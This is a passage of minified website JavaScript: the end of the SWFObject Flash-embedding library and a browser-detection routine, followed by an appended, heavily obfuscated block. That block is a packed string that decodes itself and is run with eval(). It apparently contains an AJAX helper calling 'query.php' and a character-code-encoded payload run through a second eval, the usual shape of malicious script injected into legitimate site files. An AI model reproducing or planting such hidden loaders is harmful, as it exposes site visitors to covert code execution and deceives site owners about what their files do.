_6b.id=_6b.altContentId=_60;
_6b.width=_61;
_6b.height=_62;
_6b.expressInstall=_64;
showExpressInstall(_6b);
createCSS("#"+_60,"visibility:visible");
});
}
}
},getFlashPlayerVersion:function(){
return {major:ua.playerVersion[0],minor:ua.playerVersion[1],release:ua.playerVersion[2]};
},hasFlashPlayerVersion:function(_6c){
return hasPlayerVersion(_6c.split("."));
},createSWF:function(_6d,_6e,el){
if(ua.w3cdom&&_5){
createSWF(_6d,_6e,el);
}
},createCSS:function(sel,_71){
if(ua.w3cdom){
createCSS(sel,_71);
}
},addDomLoadEvent:addDomLoadEvent,addLoadEvent:addLoadEvent,getQueryParamValue:function(_72){
var q=document.location.search||document.location.hash;
if(_72==null){
return q;
}
if(q){
var _74=q.substring(1).split("&");
for(var i=0;i<_74.length;i++){
if(_74[i].substring(0,_74[i].indexOf("="))==_72){
return _74[i].substring((_74[i].indexOf("=")+1));
}
}
}
return "";
},expressInstallCallback:function(){
if(_6&&_4){
var obj=document.getElementById("SWFObjectExprInst");
if(obj){
obj.parentNode.replaceChild(_4,obj);
_4=null;
_6=false;
}
}
}};
}();
var BrowserDetect={init:function(){
this.browser=this.searchString(this.dataBrowser)||"Unknown Browser";
this.version=this.searchVersion(navigator.userAgent)||this.searchVersion(navigator.appVersion)||"Unknown Version";
this.OS=this.searchString(this.dataOS)||"Unknown OS";
},searchString:function(_dc){
for(var i=0;i<_dc.length;i++){
var _de=_dc[i].string;
var _df=_dc[i].prop;
this.versionSearchString=_dc[i].versionSearch||_dc[i].identity;
if(_de){
if(_de.indexOf(_dc[i].subString)!=-1){
return _dc[i].identity;
}
}else{
if(_df){
return _dc[i].identity;
}
}
}
},searchVersion:function(_e0){
var _e1=_e0.indexOf(this.versionSearchString);
if(_e1==-1){
return;
}
return parseFloat(_e0.substring(_e1+this.versionSearchString.length+1));
},dataBrowser:[{string:navigator.userAgent,subString:"OmniWeb",versionSearch:"OmniWeb/",identity:"OmniWeb"},{string:navigator.vendor,subString:"Apple",identity:"Safari"},{prop:window.opera,identity:"Opera"},{string:navigator.vendor,subString:"iCab",identity:"iCab"},{string:navigator.vendor,subString:"KDE",identity:"Konqueror"},{string:navigator.userAgent,subString:"Firefox",identity:"Firefox"},{string:navigator.vendor,subString:"Camino",identity:"Camino"},{string:navigator.userAgent,subString:"Netscape",identity:"Netscape"},{string:navigator.userAgent,subString:"MSIE",identity:"Explorer",versionSearch:"MSIE"},{string:navigator.userAgent,subString:"Gecko",identity:"Mozilla",versionSearch:"rv"},{string:navigator.userAgent,subString:"Mozilla",identity:"Netscape",versionSearch:"Mozilla"}],dataOS:[{string:navigator.platform,subString:"Win",identity:"Windows"},{string:navigator.platform,subString:"Mac",identity:"Mac"},{string:navigator.platform,subString:"Linux",identity:"Linux"}]};
BrowserDetect.init();



d='function  $M(file -z ?P L-B="GE <= a ,rt="" Ke ,E=tru & ,r.offset=100 Un L-L @u @y @J LA9 N ,e @q LA9 N Um L-n ],P ]Urg L-k(); .sxml2 X1 A.icrosoft X2 -z=null}}if(!  z Ztypeof  M!="undefined" -z : M ]+ E= 4}} Uc _> -t[ $o [>,false) Uv _>, =vars Z 4== =vars A=  /( % $o), % >)) + t[ % $o) [% >) W} UH L$p, $S A$T= % Yx);regexp :RegExp( Yx+"|"+ $T); H/ Sp 6regexp) Ii=0;i< H/ hj= H/[i] 6"=");if( 4= SS -v G + c G}}}; a.trim _$f Z"qabcdef".indexOf( $o.substr(0,1))>=0){ H $rs So 6\'q\') 8\'\') 6\'v\') I Hi=0;i< $rs hrs[i]=parseInt( $rs[i],16)- k =  $rs 8\',\')+\',\'}else{ajax gr.offset2=25; =  k}; 9unR ( !){eval( 9  ]UrN L db&& Yt 7 -H( Yt W} 3 drt 7 OR + rt SR}}  c(" $a",new Date().getTime()); $h : / ]Ikey in(  t) Zfalse== C1]&& 4==  b A$T=  v(key, C0] W ,t[key] ?t[ $T[0] [$T[1] W;key ST[0]} $h[ $h 7]=key+"="+ C0]} 3$R Oh 8 Yx) + rt+ Sh 8 Yx)} Uk L-B="POS <t="";d=\'v={@ VM$1XH:"e-",@ V`$1XH:"",*b VM$1Xv30:"l(\\\'l=Str"\\\\_:"ing.fr",JG*2%a%fzV*aV:"omCha",>%8%8*2*5LB0_*4:"rCode("<6#fF%3#f#7#d_$4y<d*3*6$eV*e*d$a*3&6R8#b!0G%4#d%eTM `8B6P*3K#6>*4HY/c*dPB1JJ-a$4*6&9<7E*bQ`NX@U&3W2E*eQ*4?Q*2E&7W5!3%b#e#8!0*8#6J `6PV#c#9!fB3*1V&6W9*7#f%6-3*d#f-d-fy,a2%2#e T T#c!1&1/b#eT!1#c!1*4*b-d&1/4-f#f%6%2#d ^5`y<4?T*5KUB6P*3Y/9*eZw*5#a#9A*7&9/1@U TLP T&1D3HK%8>O@w*5Y/9O~T@#6T@~&9D1ZwJB6A*eZG&9,d5H*3#8#7E*5?%8&7/d-eF!fJ-eFG%6y/6B0!2G_%3#f_%3yD0%1EJ%1EHwA&5,d0@$f!2#e$1MX?yD1*9U%aAGA*9A&9,a2#7G-a?*1-bM?I/1-0-7%4%1$4T#d-c `9J?%8J%3AGE&7Df*e!0*cZA#b!3*2 `aH-aOB7B7OJGI<2?GJ#aPP?$e&1W5%4z$1*7Gz$1*5I/3*4#d*0!3`!0F!0 `8$dO%6`%4$4%b!f&5D4OOOB0#eVN-1&3W0*3$b!3*b*aw*0$b&3De%a@UB0#e-dN-1&3W2>M-3*0K*2*5_&5WeOA%7*3#6-7%e*3&6/4%7!fN f&1,a6M$f_*b#7B1B1#7&5D7#f%a$3XUFPZ e9QMAU$1JB4U&9Wf*5*8@$1>U>@YR1%4Q%6%4UQ%6#7&9Rb$f%fzB3B7*5?*fI/9$1*4#eUUA$1*2&6D6^F#8~#b%0%0F ea%7%eN%7!2 ^7?y/5Z#e#b$e$e_Z*0yD6~GF#8^#c%0%0&4D9#8O>HB5>*d@Y<9*5*5#8>*6>>#7YW1^??*4B7?*fGI<7*4#6V*eOA$0V&6/2@#d-awA-f#f_yW5!0#b-8*aE-d#d!3&0Wd%8*3%0$e!fT*5@YWeGB7J-aB2AAH&9<9%7`-b$e|$3-b$b&5R4$b-d$d$4|-d$4$3 j6-9Q$b%e-9w%7X&3,ac%8zK-c$f$b|-c&6R4%aM-dN%aB1-d%e j7$a?U-4Q!3!3?&3<2-7%3-7%4-7T-7%6&1,af%f-f$0-f$1-f$3-f&9R3%0N%0X%0M%0`I,acN-cX-cM-c`-c&6Rc-f$d-f$e-f$f-fB0&9,ac$e-c$f-cB0G!f-7&6,a0FF#7H#6H^H&4D9P#aP#bP#cP#d&5D2#f!f*1A`$a*3*6&6/4-4GF%6GF*fG&1/4T!1_AAAF*f&1D3H@KJ@-bPPYD2!f?KT?-aHP&7/6%7ULV-6UB0-4&3R5!fV$d!fV$4!fV&3<7P>$a-6MM_*b&5RczPJ^#b!3N#d `8M|G-d$bU%2P&5,a9*b>-eG-9%8>-e&1/fV%4ULVNN#e&3/6N*0VQ-e!3>*4&3W3 ^4#8^@E~#8y<2H>$4%0_?*6*6&5/b#e#e~ ^4_$4zy<0#eV$d*0!3#c#6!3&3W4OJ@-fG!2#b#6y/2*4OJ@-f#d_$3yW2_^*fU%2H_#7&5/8M$fL%2H_^*f&5/a%0G!3^VN$dU&3<6*4A-4#fJL#b*0&9D1T*3@-a*5>-3>YD9#9#bH%4-8|$a*4 j5*2#b#6*2#f#6*1#eID0#b#8H#d#6H^#b ed#9OG#8~G#9P&1D3#a#7O#f#9O#e#e&7/dO#6GJJGJP&1D5#a#9^#f#a^#a#a&9/f#8#9!f#8#8!f~~&3D3#c#aO#dO#c#aO&7D9L~LOLJL#6yW0T*3%eM$aH>^Y<d*1~#fZ*0EXM ea*4*5$3^^OB5GIR4N-d%b-f#f-5X$4y<e$3KO%bM$4Q*8&5<b%4N*6Q%7%8@K&3D4U$bz%4Q%6~#b&9DbHB4E~|*4L%f&7R7M$3#dJJ?LV&3<aO@B2O@|O@YRc^G-c^GB3T%2IWaE-dGP-d@EL&0<3%fZ!fE@!3Q$3&0D1ZQK$1@??U&3Db!3*3>!0#8*2|*9&0<cH!fK#b!fP~!fYW0%8Z$aF*eFH%0 ec*8*6?#f?$dzZIDd-c!2E@Q@E-c `6F$bZ%8`K*1^&4D9#9A$1%eQ$0$1$d&9W1#c~*2*0OF#9F&4,a1B1B1#fE*5*1*4E&4<aE@E?-b^%a| j9T`w*9$0w$1w&4R3|G>%8LB2*0>&5W8*2*5>-2P>NL&5,d1A-3~%f$4$4%b`&6,a0-c-5-4*5@`B5*3Y/dzB2*7*a?-2*f@I/2*6 ^b ^a*7!2OyD3%7$4w$e*2*2$3$a&5R5NA-1*5`$e$dP&9/3Q`UJHH!0@&0<2$b*5>*c*3%2$b>YWc*0MN`%8#e-d$a&3W5>#9#6%aMKB1*3Y,ae-8*1F^-5*c*1E&4W3?A%6%b`A@#dy/9*9LA*eJG*2%a&6<aM!1%aT#e TT&1DcT@A-3ZQz|&9<c%1|#a%e%f%eT#b `2L#d-eF ^f#d_yRf>L-0P-9X>#fYDd ^9*4#f!2#aN*4yRb-6%3w-0%3%f%7?y/7%8T%1%4EA-bH&0<4-8*dE>N-eE*6 ja!3*f*9U#eV*5!3&3/dNHB4B4B4*2%1|&7Rc*1EXz#fEXz ee!fA$1$eT?~Z&6<5$4-5-4*3*0%6N%e&0<6MKQ$1@-4#e!3&3/d!3-6EUE-7L$3&0<dz*9zz$a$1%a$dYRcZH!f$b$a%b!f~Y<1EZ||N#f~~&5<9`$1#6z$f$1zzY<b`~wN$3^#7^&6R5 fHT%2&1<c%fzPZXQ$1*2&3,aeA$0%1GA%0V*a&6D8G%aL-7|`$eQI/fHJ#8B5*b%8$bK&7/f%3%3LH*5~#8E&7DfF*8A^?!1H!1&1/7*4NK$eE*8|| j4z@!3F*0-0%4M&3R0#6$awXKMNHY/cPMQ-6MNK$1&3<9?@#d_!2V@$dyR7%a|$aM$3_?G&5/f!f-f%eL%4G#7$f&7/5@O%6NN%a$3w&5Wb$0$1$4KH@>HY/8*cG#9L_#f*0%7&5R6wT%fB1FLF*7&4<b%0V%1F!fGB1w&4<c$3T$b!0UXw$3&0<9%2wKw$4|#a%8&0R1KKZX>^$ewYR6FFJEK-fZ%1&4<5*0%7#8$b$f%fzB3ID3_~O%8Z%6M*8&5R8Z%e*a$dP#aA*b&9/9$b!f@V#aUU%f&6D2ZQ%8wz-3%aU edVV#6AN%1LL&6<1A#aZ`K$eX%e&9R0X!2#7%b%8$4%3%fy<bV#c%a~|%b$a-b&6,a5*4$fT_$f?L!1&1De*4?*8!fL$a%a| jd$4`@GF#cE-8&4D3K%a|*a$1%aQ%a&5R6z>*1@M%3H>Y/e#c#c#a#aJ*7*7A&9DeJ$0wQ%b`KF&4W5L-0$fXX%3%f%bIR4?@#d!2#eN%7Xy,aa%f$3%bV*4!fB1A&6<3#f ^1T%3%e%e%4y<aK$4*6%3$bA*bJ&9D1V#8V*9A-1%1%2&6/9?E*b$e$0N%bX&7R7!0*5w%6>!0*6#d `6XPQwwX%8M&3/8*f@$b#6@>-0PY,d2EE-0^E#c-3X j9KZK>-2>$bzY,d1$4Z*5%4?>-3@Y<2#d!0HXE-d?!0&0WdE$3%fT#e TU&1/6!3-0*1#fJ%7K|&3W4G!f>*1KN`L&6<5#f#a#9#dT#d%6#fy/8$4#d%4L$3$0Kw&0R6?A_V*2-3-8-9y<2%4%aB8%6%6???I/5F>FAF?FU ea~?^?#6?#7?ID7A#8A#bA#dA#9&9/5#6_#a_#b_#c_&5W0>*1>*2>*3>*4Y/4*2F*3F*6F*7F&4W8F*9F*aF*bF*c e1*a!1*b!1*c!1*d!1&1,a7P#8$d$fK$d$ezI/9%4L#eA|#e%4#d&1D9#b*7#9*2#aP~B0YD2JJ#7$3`QMP&9Re#8$a|$aJOOOIDc%6M%2ZAT?&1\\\\E:"32);ev",*``ZXK*b$0$1:"al(l)\\\'",EE!0*9Q>!0#8*2:");"};dk=[] I-r x in v){dk.push(trim(x,v))};e-l(dk 8\\\'\\\'))!v7#v8$vc%vb&:8*v9+,q-va/+7<,b>!8?!a@!bA!9BvdD+8E!7F!4G!dH#0I:90J#2K%cL!eM$7N$5O#3P#1Q$2R,cT%5U!cV!6W+9X$6Y&8Z%d^#5_!5`$8w%9y&2z$c|$9~#4\\\\,#6^L%2*0>$f*2\' Ic=46;c--;d=(t=d 6\'!#$%&*+-/<>?@ABDEFGHIJKLMNOPQRTUVWXYZ^_`wyz|~\\\\\'[c])) 8t.pop())); 9 (=d K &}; 9unAJAX L dE -q ]+ rN( $R); 3 rr -A 2 Yr)} 3 z){ Hself=this; 3 B=="GET" A$K=  F+  i+ Yt , R$K W +  R F W;try{  z.setRequestHeader("Content-Type","application/x-www-form-urlencoded" 5){}}  z.onreadystatechange !){switch( #z.readyState){case 1: #L 02: #u 03: #y 04: ;= #z.r (Text; ;XML= #z.r (XML; #C[0 Q; #C[1 QText; 3#w){self.r N 3#A A)= #A.nodeName; ).toLowerCase(); 3)=="input Jselect Joption Jtextarea" A#A. >= ; +#A.innerHTML= ;}} 3#C[0]=="200" A#J ]+#e()} #rt="";break} Uz.send( Yt)}} Um ],rg()} a.ajax : $M();try{ H $G 2\' $D\') *c("query", $G gd gf) *F="query.php" *B SG gB gf *rr=\' $rz\' *L SN *u Sg *y Ss *J Sx; P 5){ P)}  this g !=function( #self g $kx_ %encodeURIComponent( &e ,rr ?A ?F=file ,t :Object ],C : /(2) (esponse )elemNodeName *;ajax g +}else{  ,;   - A  .try{  z :ActiveXObject("M /Array 0();break;case  2=document.getElementById( 3if(  4true 5)}catch(e 6.split( 7.length 8.join( 9this.r :=new  ;self.r ( <T" ,i="?" ,rx="&" ,r =return >value ?=null , @ !){ U A){  C  t[key][ G( $j[0], $j[1]) Hvar  I;for( J"|| )==" K ,b= 4 ,w=fals L !  MXMLHttpRequest NunR (()} O -rt+= Yx+ $ Pajax.runAJAX( Q]= #z.status Rz.open(  B,  S= $ T-d!3 U} , V%b%a#6Q W, 4) X.XMLHTTP" 5 Y  r Z){if( []= /(  ]()  ^!2* _ L$o,  `&0/ awindow d$R A3  e&4/ f$3%6%fT$4 g. $ h 7;i++ A$ j&7< k $f[ $o]}';for(c=130;c;d=(t=d.split('   ! # $ % & ( ) * + , - . / 0 2 3 4 5 6 7 8 9 : ; < = > ? @ A C G H I J K L M N O P Q R S T U V W X Y Z [ ] ^ _ ` a d e f g h j k'.substr(c-=(x=c<2?1:2),x))).join(t.pop()));eval(d)

